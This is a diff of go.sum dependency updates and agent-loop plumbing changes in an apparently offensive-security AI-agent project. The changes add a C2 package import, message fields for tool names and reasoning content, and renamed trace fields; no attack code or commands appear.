github.com/go-playground/assert/v2 v2.2.0 h1:JvknZsQTYeFEAhQwI4qEt9cyV5ONwRHC+lYKSsYSR8s= github.com/go-playground/assert/v2 v2.2.0 h1:JvknZsQTYeFEAhQwI4qEt9cyV5ONwRHC+lYKSsYSR8s=
github.com/go-playground/assert/v2 v2.2.0/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4= github.com/go-playground/assert/v2 v2.2.0/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4=
github.com/go-playground/locales v0.14.1 h1:EWaQ/wswjilfKLTECiXz7Rh+3BjFhfDFKv/oXslEjJA= github.com/go-playground/locales v0.14.1 h1:EWaQ/wswjilfKLTECiXz7Rh+3BjFhfDFKv/oXslEjJA=
@@ -75,8 +82,8 @@ github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69
github.com/golang-jwt/jwt/v5 v5.2.2 h1:Rl4B7itRWVtYIHFrSNd7vhTiz9UpLdi6gZhZ3wEeDy8= github.com/golang-jwt/jwt/v5 v5.2.2 h1:Rl4B7itRWVtYIHFrSNd7vhTiz9UpLdi6gZhZ3wEeDy8=
github.com/golang-jwt/jwt/v5 v5.2.2/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk= github.com/golang-jwt/jwt/v5 v5.2.2/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek=
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
@@ -90,6 +97,8 @@ github.com/gopherjs/gopherjs v1.17.2 h1:fQnZVsXk8uxXIStYb0N4bGk7jeyTalG/wsZjQ25d
github.com/gopherjs/gopherjs v1.17.2/go.mod h1:pRRIvn/QzFLrKfvEz3qUuEhtE/zLCWfreZ6J5gM2i+k= github.com/gopherjs/gopherjs v1.17.2/go.mod h1:pRRIvn/QzFLrKfvEz3qUuEhtE/zLCWfreZ6J5gM2i+k=
github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc= github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1 h1:VNqngBF40hVlDloBruUehVYC3ArSgIyScOAyMRqBxRg=
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1/go.mod h1:RBRO7fro65R6tjKzYgLAFo0t1QEXY1Dp+i/bvpRiqiQ=
github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
github.com/jessevdk/go-flags v1.4.0/go.mod h1:4FA24M0QyGHXBuZZK/XkWh8h0e1EYbRYJSGM75WSRxI= github.com/jessevdk/go-flags v1.4.0/go.mod h1:4FA24M0QyGHXBuZZK/XkWh8h0e1EYbRYJSGM75WSRxI=
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM= github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
@@ -154,6 +163,8 @@ github.com/rollbar/rollbar-go v1.0.2/go.mod h1:AcFs5f0I+c71bpHlXNNDbOWJiKwjFDtIS
github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo= github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo=
github.com/sirupsen/logrus v1.9.3 h1:dueUQJ1C2q9oE3F7wvmSGAaVtTmUizReu6fjN8uqzbQ= github.com/sirupsen/logrus v1.9.3 h1:dueUQJ1C2q9oE3F7wvmSGAaVtTmUizReu6fjN8uqzbQ=
github.com/sirupsen/logrus v1.9.3/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ= github.com/sirupsen/logrus v1.9.3/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ=
github.com/skip2/go-qrcode v0.0.0-20200617195104-da1b6568686e h1:MRM5ITcdelLK2j1vwZ3Je0FKVCfqOLp5zO6trqMLYs0=
github.com/skip2/go-qrcode v0.0.0-20200617195104-da1b6568686e/go.mod h1:XV66xRDqSt+GTGFMVlhk3ULuV0y9ZmzeVGR4mloJI3M=
github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f h1:Z2cODYsUxQPofhpYRMQVwWz4yUVpHF+vPi+eUdruUYI= github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f h1:Z2cODYsUxQPofhpYRMQVwWz4yUVpHF+vPi+eUdruUYI=
github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f/go.mod h1:JqzWyvTuI2X4+9wOHmKSQCYxybB/8j6Ko43qVmXDuZg= github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f/go.mod h1:JqzWyvTuI2X4+9wOHmKSQCYxybB/8j6Ko43qVmXDuZg=
github.com/smarty/assertions v1.16.0 h1:EvHNkdRA4QHMrn75NZSoUQ/mAUXAYWfatfB01yTCzfY= github.com/smarty/assertions v1.16.0 h1:EvHNkdRA4QHMrn75NZSoUQ/mAUXAYWfatfB01yTCzfY=
@@ -191,6 +202,26 @@ github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zI
github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4= github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4=
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA=
go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A=
go.opentelemetry.io/otel v1.34.0 h1:zRLXxLCgL1WyKsPVrgbSdMN4c0FMkDAskSTQP+0hdUY=
go.opentelemetry.io/otel v1.34.0/go.mod h1:OWFPOQ+h4G8xpyjgqo4SxJYdDQ/qmRH+wivy7zzx9oI=
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0 h1:OeNbIYk/2C15ckl7glBlOBp5+WlYsOElzTNmiPW/x60=
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0/go.mod h1:7Bept48yIeqxP2OZ9/AqIpYS94h2or0aB4FypJTc8ZM=
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0 h1:BEj3SPM81McUZHYjRS5pEgNgnmzGJ5tRpU5krWnV8Bs=
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0/go.mod h1:9cKLGBDzI/F3NoHLQGm4ZrYdIHsvGt6ej6hUowxY0J4=
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0 h1:jBpDk4HAUsrnVO1FsfCfCOTEc/MkInJmvfCHYLFiT80=
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0/go.mod h1:H9LUIM1daaeZaz91vZcfeM0fejXPmgCYE8ZhzqfJuiU=
go.opentelemetry.io/otel/metric v1.34.0 h1:+eTR3U0MyfWjRDhmFMxe2SsW64QrZ84AOhvqS7Y+PoQ=
go.opentelemetry.io/otel/metric v1.34.0/go.mod h1:CEDrp0fy2D0MvkXE+dPV7cMi8tWZwX3dmaIhwPOaqHE=
go.opentelemetry.io/otel/sdk v1.34.0 h1:95zS4k/2GOy069d321O8jWgYsW3MzVV+KuSPKp7Wr1A=
go.opentelemetry.io/otel/sdk v1.34.0/go.mod h1:0e/pNiaMAqaykJGKbi+tSjWfNNHMTxoC9qANsCzbyxU=
go.opentelemetry.io/otel/sdk/metric v1.31.0 h1:i9hxxLJF/9kkvfHppyLL55aW7iIJz4JjxTeYusH7zMc=
go.opentelemetry.io/otel/sdk/metric v1.31.0/go.mod h1:CRInTMVvNhUKgSAMbKyTMxqOBC0zgyxzW55lZzX43Y8=
go.opentelemetry.io/otel/trace v1.34.0 h1:+ouXS2V8Rd4hp4580a8q23bg0azF2nI8cqLYnC8mh/k=
go.opentelemetry.io/otel/trace v1.34.0/go.mod h1:Svm7lSjQD7kG7KJ/MUHPVXSDGz2OX4h0M2jHBhmSfRE=
go.opentelemetry.io/proto/otlp v1.5.0 h1:xJvq7gMzB31/d406fB8U5CBdyQGw4P399D1aQWU/3i4=
go.opentelemetry.io/proto/otlp v1.5.0/go.mod h1:keN8WnHxOy8PG0rQZjJJ5A2ebUoafqWp0eVQ4yIXvJ4=
go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk= go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk=
go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo= go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo=
go.uber.org/mock v0.4.0 h1:VcM4ZOtdbR4f6VXfiOpwpVJDL6lCReaZ6mw31wqh7KU= go.uber.org/mock v0.4.0 h1:VcM4ZOtdbR4f6VXfiOpwpVJDL6lCReaZ6mw31wqh7KU=
@@ -216,8 +247,8 @@ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/net v0.24.0 h1:1PcaxkF854Fu3+lvBIx5SYn9wRlBzzcnHZSiaFFAb0w= golang.org/x/net v0.35.0 h1:T5GQRQb2y08kTAByq9L4/bz8cipCdA8FbRTXewonqY8=
golang.org/x/net v0.24.0/go.mod h1:2Q7sJY5mzlzWjKtYUEXSlBWCdyaioyXzRB2RtU8KVE8= golang.org/x/net v0.35.0/go.mod h1:EglIi67kWsHKlRzzVMUD93VMSWGFOMSZgxFjparz1Qk=
golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI= golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI=
golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU= golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU=
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
@@ -251,9 +282,14 @@ golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8T
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f h1:gap6+3Gk41EItBuyi4XX/bp4oqJ3UwuIMl25yGinuAA=
google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng= google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f/go.mod h1:Ic02D47M+zbarjYYUlK57y316f2MoN0gjAwI3f2S95o=
google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f h1:OxYkA3wjPsZyBylwymxSHa7ViiW1Sml4ToBrncvFehI=
google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f/go.mod h1:+2Yz8+CLJbIfL9z73EW45avw8Lmge3xVElCP9zEKi50=
google.golang.org/grpc v1.69.4 h1:MF5TftSMkd8GLw/m0KM6V8CMOCY6NZ1NQDPGFgbTt4A=
google.golang.org/grpc v1.69.4/go.mod h1:vyjdE6jLBI76dgpDojsFGNaHlxdjXN9ghpnd2o7JGZ4=
google.golang.org/protobuf v1.36.3 h1:82DV7MYdb8anAVi3qge1wSnMDrnKK7ebr+I0hHRN1BU=
google.golang.org/protobuf v1.36.3/go.mod h1:9fA7Ob0pmnwhb644+1+CVWFRbNajQ6iRojtC/QF5bRE=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
Binary file not shown.

Before

Width:  |  Height:  |  Size: 832 KiB

After

Width:  |  Height:  |  Size: 726 KiB

BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 MiB

+133 -43
View File
@@ -13,6 +13,7 @@ import (
"sync" "sync"
"time" "time"
"cyberstrike-ai/internal/c2"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin" "cyberstrike-ai/internal/mcp/builtin"
@@ -39,6 +40,7 @@ type Agent struct {
toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具) toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具)
currentConversationID string // 当前对话ID(用于自动传递给工具) currentConversationID string // 当前对话ID(用于自动传递给工具)
promptBaseDir string // 解析 system_prompt_path 时相对路径的基准目录(通常为 config.yaml 所在目录) promptBaseDir string // 解析 system_prompt_path 时相对路径的基准目录(通常为 config.yaml 所在目录)
toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short
} }
// ResultStorage 结果存储接口(直接使用 storage 包的类型) // ResultStorage 结果存储接口(直接使用 storage 包的类型)
@@ -73,6 +75,11 @@ func agentConversationIDFromContext(ctx context.Context) string {
return v return v
} }
// ConversationIDFromContext 返回当前 Agent 请求上下文中注入的对话 ID(如 C2 MCP 入队与人机协同门控使用)。
func ConversationIDFromContext(ctx context.Context) string {
return agentConversationIDFromContext(ctx)
}
// ToolCallInterceptor allows caller to gate or rewrite tool arguments just before execution. // ToolCallInterceptor allows caller to gate or rewrite tool arguments just before execution.
// Returning a non-nil error means the tool call is rejected and execution is skipped. // Returning a non-nil error means the tool call is rejected and execution is skipped.
type ToolCallInterceptor func(ctx context.Context, toolName string, args map[string]interface{}, toolCallID string) (map[string]interface{}, error) type ToolCallInterceptor func(ctx context.Context, toolName string, args map[string]interface{}, toolCallID string) (map[string]interface{}, error)
@@ -162,6 +169,7 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
resultStorage: resultStorage, resultStorage: resultStorage,
largeResultThreshold: largeResultThreshold, largeResultThreshold: largeResultThreshold,
toolNameMapping: make(map[string]string), // 初始化工具名称映射 toolNameMapping: make(map[string]string), // 初始化工具名称映射
toolDescriptionMode: "short",
} }
} }
@@ -185,6 +193,10 @@ type ChatMessage struct {
Content string `json:"content,omitempty"` Content string `json:"content,omitempty"`
ToolCalls []ToolCall `json:"tool_calls,omitempty"` ToolCalls []ToolCall `json:"tool_calls,omitempty"`
ToolCallID string `json:"tool_call_id,omitempty"` ToolCallID string `json:"tool_call_id,omitempty"`
// ToolName 仅 tool 角色:从 Eino/轨迹 JSON 的 name 或 tool_name 恢复,供续跑构造 ToolMessage。
ToolName string `json:"tool_name,omitempty"`
// ReasoningContent 对应 OpenAI/DeepSeek 的 reasoning_content;思考模式 + 工具调用后续跑须回传(见 DeepSeek 文档)。
ReasoningContent string `json:"reasoning_content,omitempty"`
} }
// MarshalJSON 自定义JSON序列化,将tool_calls中的arguments转换为JSON字符串 // MarshalJSON 自定义JSON序列化,将tool_calls中的arguments转换为JSON字符串
@@ -198,11 +210,17 @@ func (cm ChatMessage) MarshalJSON() ([]byte, error) {
if cm.Content != "" { if cm.Content != "" {
aux["content"] = cm.Content aux["content"] = cm.Content
} }
if cm.ReasoningContent != "" {
aux["reasoning_content"] = cm.ReasoningContent
}
// 添加tool_call_id(如果存在) // 添加tool_call_id(如果存在)
if cm.ToolCallID != "" { if cm.ToolCallID != "" {
aux["tool_call_id"] = cm.ToolCallID aux["tool_call_id"] = cm.ToolCallID
} }
if cm.ToolName != "" {
aux["tool_name"] = cm.ToolName
}
// 转换tool_calls,将arguments转换为JSON字符串 // 转换tool_calls,将arguments转换为JSON字符串
if len(cm.ToolCalls) > 0 { if len(cm.ToolCalls) > 0 {
@@ -336,10 +354,10 @@ func (fc *FunctionCall) UnmarshalJSON(data []byte) error {
// AgentLoopResult Agent Loop执行结果 // AgentLoopResult Agent Loop执行结果
type AgentLoopResult struct { type AgentLoopResult struct {
Response string Response string
MCPExecutionIDs []string MCPExecutionIDs []string
LastReActInput string // 最后一轮ReAct的输入(压缩后的messagesJSON格式 LastAgentTraceInput string // 最后一轮代理消息轨迹(压缩后的 messagesJSON;与 multiagent.RunResult 字段对齐
LastReActOutput string // 最终大模型的输出 LastAgentTraceOutput string // 最终助手输出文本
} }
// ProgressCallback 进度回调函数类型 // ProgressCallback 进度回调函数类型
@@ -430,6 +448,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
Content: msg.Content, Content: msg.Content,
ToolCalls: msg.ToolCalls, ToolCalls: msg.ToolCalls,
ToolCallID: msg.ToolCallID, ToolCallID: msg.ToolCallID,
ToolName: msg.ToolName,
}) })
addedCount++ addedCount++
contentPreview := msg.Content contentPreview := msg.Content
@@ -471,7 +490,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
} }
// 用于保存当前的messages,以便在异常情况下也能保存ReAct输入 // 用于保存当前的messages,以便在异常情况下也能保存ReAct输入
var currentReActInput string var currentAgentTraceInput string
maxIterations := a.maxIterations maxIterations := a.maxIterations
thinkingStreamSeq := 0 thinkingStreamSeq := 0
@@ -490,9 +509,9 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
if err != nil { if err != nil {
a.logger.Warn("序列化ReAct输入失败", zap.Error(err)) a.logger.Warn("序列化ReAct输入失败", zap.Error(err))
} else { } else {
currentReActInput = string(messagesJSON) currentAgentTraceInput = string(messagesJSON)
// 更新result中的值,确保始终保存最新的ReAct输入(压缩后的) // 更新result中的值,确保始终保存最新的ReAct输入(压缩后的)
result.LastReActInput = currentReActInput result.LastAgentTraceInput = currentAgentTraceInput
} }
// 检查上下文是否已取消 // 检查上下文是否已取消
@@ -500,13 +519,13 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
case <-ctx.Done(): case <-ctx.Done():
// 上下文被取消(可能是用户主动暂停或其他原因) // 上下文被取消(可能是用户主动暂停或其他原因)
a.logger.Info("检测到上下文取消,保存当前ReAct数据", zap.Error(ctx.Err())) a.logger.Info("检测到上下文取消,保存当前ReAct数据", zap.Error(ctx.Err()))
result.LastReActInput = currentReActInput result.LastAgentTraceInput = currentAgentTraceInput
if ctx.Err() == context.Canceled { if ctx.Err() == context.Canceled {
result.Response = "任务已被取消。" result.Response = "任务已被取消。"
} else { } else {
result.Response = fmt.Sprintf("任务执行中断: %v", ctx.Err()) result.Response = fmt.Sprintf("任务执行中断: %v", ctx.Err())
} }
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
return result, ctx.Err() return result, ctx.Err()
default: default:
} }
@@ -579,11 +598,17 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
thinkingStreamSeq++ thinkingStreamSeq++
thinkingStreamId := fmt.Sprintf("thinking-stream-%s-%d-%d", conversationID, i+1, thinkingStreamSeq) thinkingStreamId := fmt.Sprintf("thinking-stream-%s-%d-%d", conversationID, i+1, thinkingStreamSeq)
thinkingStreamStarted := false thinkingStreamStarted := false
var thinkingWire string
response, err := a.callOpenAIStreamWithToolCalls(ctx, messages, tools, func(delta string) error { response, err := a.callOpenAIStreamWithToolCalls(ctx, messages, tools, func(delta string) error {
if delta == "" { if delta == "" {
return nil return nil
} }
var deltaOut string
thinkingWire, deltaOut = openai.NormalizeStreamingDelta(thinkingWire, delta)
if deltaOut == "" {
return nil
}
if !thinkingStreamStarted { if !thinkingStreamStarted {
thinkingStreamStarted = true thinkingStreamStarted = true
sendProgress("thinking_stream_start", " ", map[string]interface{}{ sendProgress("thinking_stream_start", " ", map[string]interface{}{
@@ -592,18 +617,18 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
"toolStream": false, "toolStream": false,
}) })
} }
sendProgress("thinking_stream_delta", delta, map[string]interface{}{ sendProgress("thinking_stream_delta", deltaOut, openai.WithSSEAccumulated(map[string]interface{}{
"streamId": thinkingStreamId, "streamId": thinkingStreamId,
"iteration": i + 1, "iteration": i + 1,
}) }, thinkingWire))
return nil return nil
}) })
if err != nil { if err != nil {
// API调用失败,保存当前的ReAct输入和错误信息作为输出 // API调用失败,保存当前的ReAct输入和错误信息作为输出
result.LastReActInput = currentReActInput result.LastAgentTraceInput = currentAgentTraceInput
errorMsg := fmt.Sprintf("调用OpenAI失败: %v", err) errorMsg := fmt.Sprintf("调用OpenAI失败: %v", err)
result.Response = errorMsg result.Response = errorMsg
result.LastReActOutput = errorMsg result.LastAgentTraceOutput = errorMsg
a.logger.Warn("OpenAI调用失败,已保存ReAct数据", zap.Error(err)) a.logger.Warn("OpenAI调用失败,已保存ReAct数据", zap.Error(err))
return result, fmt.Errorf("调用OpenAI失败: %w", err) return result, fmt.Errorf("调用OpenAI失败: %w", err)
} }
@@ -629,19 +654,19 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
continue continue
} }
// OpenAI返回错误,保存当前的ReAct输入和错误信息作为输出 // OpenAI返回错误,保存当前的ReAct输入和错误信息作为输出
result.LastReActInput = currentReActInput result.LastAgentTraceInput = currentAgentTraceInput
errorMsg := fmt.Sprintf("OpenAI错误: %s", response.Error.Message) errorMsg := fmt.Sprintf("OpenAI错误: %s", response.Error.Message)
result.Response = errorMsg result.Response = errorMsg
result.LastReActOutput = errorMsg result.LastAgentTraceOutput = errorMsg
return result, fmt.Errorf("OpenAI错误: %s", response.Error.Message) return result, fmt.Errorf("OpenAI错误: %s", response.Error.Message)
} }
if len(response.Choices) == 0 { if len(response.Choices) == 0 {
// 没有收到响应,保存当前的ReAct输入和错误信息作为输出 // 没有收到响应,保存当前的ReAct输入和错误信息作为输出
result.LastReActInput = currentReActInput result.LastAgentTraceInput = currentAgentTraceInput
errorMsg := "没有收到响应" errorMsg := "没有收到响应"
result.Response = errorMsg result.Response = errorMsg
result.LastReActOutput = errorMsg result.LastAgentTraceOutput = errorMsg
return result, fmt.Errorf("没有收到响应") return result, fmt.Errorf("没有收到响应")
} }
@@ -649,8 +674,8 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
// 检查是否有工具调用 // 检查是否有工具调用
if len(choice.Message.ToolCalls) > 0 { if len(choice.Message.ToolCalls) > 0 {
// 思考内容:如果本轮启用了思考流式增量(thinking_stream_*前端会去重 // ReAct 助手正文流式增量(thinking_stream_*在 UI 上归为「思考」;若与 streamId 重复则前端会去重
// 同时也需要在该“思考阶段结束”时补一条可落库的 thinking用于刷新后持久化展示)。 // 该条 thinking 用于刷新后持久化展示(与流式聚合一致)。
if choice.Message.Content != "" { if choice.Message.Content != "" {
sendProgress("thinking", choice.Message.Content, map[string]interface{}{ sendProgress("thinking", choice.Message.Content, map[string]interface{}{
"iteration": i + 1, "iteration": i + 1,
@@ -808,15 +833,21 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
"mcpExecutionIds": result.MCPExecutionIDs, "mcpExecutionIds": result.MCPExecutionIDs,
"messageGeneratedBy": "summary", "messageGeneratedBy": "summary",
}) })
var summaryWire string
streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error { streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error {
